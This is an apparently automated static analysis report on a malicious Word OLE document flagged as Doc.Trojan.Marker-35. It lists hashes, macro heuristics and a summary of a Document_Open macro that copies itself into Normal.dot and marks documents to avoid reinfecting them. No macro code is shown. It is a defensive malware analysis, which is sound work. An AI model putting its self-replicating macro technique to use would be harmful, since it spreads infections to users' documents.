Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7160002216b097b0…

MALICIOUS

Office (OLE)

59.5 KB Created: 2010-06-25 18:44:00 Authoring application: Microsoft Macintosh Word
MD5: ed9ee58781695b75892bd17cc9f41aff SHA-1: 05cf99835bb20acda89637bb6b53733ac69bc688 SHA-256: 7160002216b097b06d9b2af130adb246910f4c9da78a0e59cec3622eab65980b
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE document with a critical ClamAV detection for Doc.Trojan.Marker-35. A high-severity heuristic indicates the presence of a Document_Open macro, and a medium-severity heuristic confirms VBA macros are present. The extracted VBA script, named 'macros.bas', contains code within the 'Document_Open' subroutine that aims to copy its own code into the Normal.dot template and the active document, likely for persistence or propagation. The script explicitly mentions 'Anti-Virus macro by Patrick' and includes a marker to avoid self-infection, suggesting a deliberate attempt to evade detection while ensuring its own survival.

Heuristics 4

  • ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-35
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
f5002f7cabdb72007a507ea4a68dfb172e6f199556c3c2b08e39298247953581		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 1590 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.